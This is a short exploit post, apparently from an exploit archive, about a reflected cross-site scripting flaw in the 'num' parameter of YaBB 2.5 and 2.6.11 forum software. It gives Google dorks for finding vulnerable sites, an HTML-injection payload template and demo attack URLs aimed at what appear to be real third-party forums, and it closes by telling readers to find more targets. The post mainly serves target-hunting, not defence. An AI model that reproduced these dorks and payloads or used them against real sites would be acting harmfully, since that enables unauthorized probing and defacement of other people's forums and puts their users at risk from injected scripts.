### # Title : Exploit YaBB 2.6.11 & YaBB 2.5 XsS vulnerability # Author : Dz MinD Injector # Home : Algeria 23000 d^_^b # FaCeb0ok : https://www.facebook.com/pokeme23 # Type : proof of concept # Tested on : Windows7 & Linux # Vendor : http://www.yabbforum.com/?page_id=32 ### # <?php # echo " Freedom t0 Palastine " ; # ?> # Lov3 Explo8ting Just For Fun ! ######## [ Proof / Exploit ] ################|=> #! Google Dork : #+ inurl:YaBB.pl?num= #+ "Powered by YaBB 2.5" #+ "Powered by YaBB 2.6.11" #########################PrOof Of ConCept ################################## #+ http://[target]/[path]/YaBB.pl?num= #! Vulnerablity in YaBB.pl?num= #+ Try : ## http://[target]/[path]/YaBB.pl?num=><h1> XssEd </h1> ##Demo's : http://ugene.Xnet/forum/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E http://www.yabbforumX.com/community/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E https://antipolygraphX.org/cgi-bin/forums/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E http://dynonavionicXs.com/cgi-bin/yabb2/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E http://www.clusteXrheadaches.com/cgi-bin/yabb2/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E http://www.autoXgraph-maths.com/cgi-bin/yabb2/YaBB.pl?num=%3E%3Cmarquee%3E%3Ch1%3Emy%20test%3C/marquee%3C/h1%3E http://www.falcXonfly.de/cgi-bin/yabb2/YaBB.pl?num=%3E%3Cmarquee%3E%3Ch1%3Emy%20test%3C/marquee%3C/h1%3E !+ Find More targets in Google ^_^